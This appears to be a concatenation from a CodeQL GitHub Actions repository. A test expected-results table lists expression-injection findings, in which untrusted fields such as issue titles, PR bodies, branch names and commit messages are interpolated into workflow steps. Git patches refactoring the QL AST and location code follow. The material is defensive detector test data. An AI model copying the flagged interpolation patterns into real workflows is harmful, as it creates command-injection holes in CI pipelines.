needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | From 86075c95bd5293284dadc34f02d27c2f1c3801af Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 7 Mar 2024 22:28:54 +0100 Subject: [PATCH 0088/1267] Improve ExpressionNode Location handling --- ql/lib/codeql/actions/Ast.qll | 22 +++++++++++-------- .../actions/controlflow/internal/Cfg.qll | 9 +++++--- 2 files changed, 19 insertions(+), 12 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 21d4f052e13..1f4794ae9bc 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -68,21 +68,25 @@ class ExpressionNode extends AstNode, TExpressionNode { Job getJob() { result.getAChildNode*() = n } + /** + * Gets the length of each line in the StringValue . + */ int lineLength(int idx) { exists(string line | line = n.getValue().splitAt("\n", idx) and result = line.length() + 1) } - bindingset[i] - int unboundPartialLineLengthSum(int i) { + /** + * Gets the sum of the length of the lines up to the given index. + */ + int partialLineLengthSum(int i) { + i in [0 .. count(n.getValue().splitAt("\n"))] and result = sum(int j, int length | j in [0 .. i] and length = this.lineLength(j) | length) } - int partialLineLengthSum(int i) { - i in [0 .. count(n.getValue().splitAt("\n"))] and - result = this.unboundPartialLineLengthSum(i) - } - - predicate expressionOffsets(int sl, int sc, int el, int ec) { + /** + * Gets the absolute coordinates of the expression. + */ + predicate expressionLocation(int sl, int sc, int el, int ec) { exists(int lineDiff, string style, Location loc | loc = n.asYamlNode().getLocation() and lineDiff = loc.getEndLine() - loc.getStartLine() and @@ -164,7 +168,7 @@ class ExpressionNode extends AstNode, TExpressionNode { predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { path = n.asYamlNode().getFile().getAbsolutePath() and - this.expressionOffsets(sl, sc, el, ec) + this.expressionLocation(sl, sc, el, ec) } override File getFile() { result = n.asYamlNode().getFile() } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 0972ae50039..8cd640ace09 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -274,10 +274,13 @@ private class RunTree extends StandardPreOrderTree instanceof Run { private class StringValueTree extends StandardPreOrderTree instanceof StringValue { override ControlFlowTree getChildNode(int i) { result = - rank[i](ExpressionNode child, int sl, int el, int sc, int ec, string path | - child = super.getAChildNode() and child.hasLocationInfo(path, sl, sc, el, ec) + rank[i](ExpressionNode child, Location l | + child = super.getAChildNode() and + l = child.getLocation() | - child order by sl, sc, ec, el, child.toString() + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() ) } } From 9b97dbd870a8aa386082b21893e1d372e5ecf95b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 12 Mar 2024 10:16:43 +0100 Subject: [PATCH 0089/1267] Refactor ast nodes --- ql/lib/codeql/Locations.qll | 4 +- ql/lib/codeql/actions/Ast.qll | 905 ++------------- ql/lib/codeql/actions/ast/internal/Ast.qll | 1001 +++++++++++++++++ .../actions/controlflow/internal/Cfg.qll | 19 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 2 +- ql/lib/ext/actions_github-script.model.yml | 3 - ql/src/Debug/partial.ql | 2 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-094/CriticalExpressionInjection.ql | 4 +- .../Security/CWE-094/ExpressionInjection.ql | 4 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 7 +- ql/test/library-tests/test.expected | 427 +++---- ql/test/library-tests/test.ql | 29 +- 15 files changed, 1286 insertions(+), 1127 deletions(-) create mode 100644 ql/lib/codeql/actions/ast/internal/Ast.qll diff --git a/ql/lib/codeql/Locations.qll b/ql/lib/codeql/Locations.qll index 33a8eba30ac..96b5d45f18e 100644 --- a/ql/lib/codeql/Locations.qll +++ b/ql/lib/codeql/Locations.qll @@ -1,7 +1,7 @@ /** Provides classes for working with locations. */ import files.FileSystem -import codeql.actions.Ast +import codeql.actions.ast.internal.Ast bindingset[loc] pragma[inline_late] @@ -19,7 +19,7 @@ newtype TLocation = locations_default(_, file, startline, startcolumn, endline, endcolumn) ) or - exists(ExpressionNode e | + exists(ExpressionImpl e | e.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) ) or diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 1f4794ae9bc..2bfedd623f5 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -1,933 +1,232 @@ -private import codeql.actions.ast.internal.Yaml +private import codeql.actions.ast.internal.Ast private import codeql.Locations -newtype TAstNode = - TWorflowNode(YamlNode n) or - TExpressionNode(StringValue n, string expression, int exprOffset) { - expression = getASimpleReferenceExpression(n, exprOffset) - } +class AstNode instanceof AstNodeImpl { + AstNode getAChildNode() { result = super.getAChildNode() } -class AstNode extends TAstNode { - abstract AstNode getAChildNode(); + AstNode getParentNode() { result = super.getParentNode() } - abstract AstNode getParentNode(); + string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } - abstract string getAPrimaryQlClass(); + Location getLocation() { result = super.getLocation() } - abstract string toString(); + string toString() { result = super.toString() } - abstract Location getLocation(); + Job getEnclosingJob() { result = super.getEnclosingJob() } - abstract File getFile(); + Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } - /** - * Gets the enclosing workflow statement. - */ - Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } - - /** - * Gets a environment variable expression by name in the scope of the current node. - */ - ExpressionNode getInScopeEnvVarExpr(string name) { - exists(StringValue l, Env env | - env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), l.asYamlNode()) and - l.getAnExpression() = result - | - env.(StepEnv).getStep().getAChildNode*() = this - or - env.(JobEnv).getJob().getAChildNode*() = this - or - env.(WorkflowEnv).getWorkflow().getAChildNode*() = this - ) - } + Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } } -class ExpressionNode extends AstNode, TExpressionNode { - StringValue n; - string rawExpression; +class ScalarValue extends AstNode instanceof ScalarValueImpl { } + +class Expression extends AstNode instanceof ExpressionImpl { string expression; - int exprOffset; + string rawExpression; - ExpressionNode() { - this = TExpressionNode(n, rawExpression, exprOffset - 1) and - expression = - rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + Expression() { + expression = this.getExpression() and + rawExpression = this.getRawExpression() } - override string toString() { result = expression } - - override AstNode getAChildNode() { none() } - - override AstNode getParentNode() { result = n } - - override string getAPrimaryQlClass() { result = "ExpressionNode" } - string getExpression() { result = expression } string getRawExpression() { result = rawExpression } - - Job getJob() { result.getAChildNode*() = n } - - /** - * Gets the length of each line in the StringValue . - */ - int lineLength(int idx) { - exists(string line | line = n.getValue().splitAt("\n", idx) and result = line.length() + 1) - } - - /** - * Gets the sum of the length of the lines up to the given index. - */ - int partialLineLengthSum(int i) { - i in [0 .. count(n.getValue().splitAt("\n"))] and - result = sum(int j, int length | j in [0 .. i] and length = this.lineLength(j) | length) - } - - /** - * Gets the absolute coordinates of the expression. - */ - predicate expressionLocation(int sl, int sc, int el, int ec) { - exists(int lineDiff, string style, Location loc | - loc = n.asYamlNode().getLocation() and - lineDiff = loc.getEndLine() - loc.getStartLine() and - style = n.asYamlNode().(YamlString).getStyle() - | - // eg: - // - run: echo "hello" - // - run: 'echo "hello"' - // - run: "echo 'hello'" - style = ["", "\"", "'"] and - lineDiff = 0 and - sl = loc.getStartLine() and - el = sl and - sc = loc.getStartColumn() + exprOffset and - ec = sc + rawExpression.length() - 1 - or - // eg: - // - run: "echo 'hello' - // echo 'hello'" - // - run: "echo 'hello' - // echo 'hello' - // echo 'hello'" - style = ["", "\"", "'"] and - lineDiff > 0 and - sl = loc.getStartLine() and - el = loc.getEndLine() and - sc = loc.getStartColumn() and - ec = loc.getEndColumn() - or - // eg: - // - run: | - // echo "hello" - // - run: | - // echo "hello" - // echo "bye" - style = "|" and - exists(int r | - ( - r > 0 and - this.partialLineLengthSum(r - 1) < exprOffset and - this.partialLineLengthSum(r) >= exprOffset and - sl = loc.getStartLine() + r + 1 and - el = sl and - sc = - n.getKeyNode().getLocation().getStartColumn() + exprOffset - - this.partialLineLengthSum(r - 1) + 2 - 1 and - ec = sc + rawExpression.length() - 1 - or - r = 0 and - this.partialLineLengthSum(r) > exprOffset and - sl = loc.getStartLine() + r + 1 and - el = sl and - sc = n.getKeyNode().getLocation().getStartColumn() + 2 + exprOffset and - ec = sc + rawExpression.length() - 1 - ) - ) - or - // eg: - // - run: > - // 